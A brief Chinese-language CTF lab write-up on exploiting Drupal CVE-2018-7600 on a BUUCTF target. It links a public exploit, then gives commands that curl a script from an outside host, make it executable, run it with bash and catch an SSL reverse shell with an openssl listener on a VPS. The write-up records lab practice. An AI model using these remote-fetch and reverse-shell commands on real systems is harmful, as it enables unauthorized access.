声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!
前期准备
进入之后环境安装
语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步
利用
直接使用网上公开的exp
https://github.com/a2u/CVE-2018-7600
将exp里的命令换成env即可
反弹会话
可参考我上一篇文章,ssl反弹shell [struts2]s2-052 BUUCTF
在本地工具代码里修改--下载脚本文件
curl -O http://1.1.1.1:8080/openssl.sh
在本地工具代码里修改--赋予权限
chmod 777 openssl.sh
在vps运行openssl进行监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
在本地工具代码里修改--执行脚本
/bin/bash ./openssl.sh
在vps里就可看到成功获得了一个shell
后面就是尝试提权,这里是buu靶场,就不搞了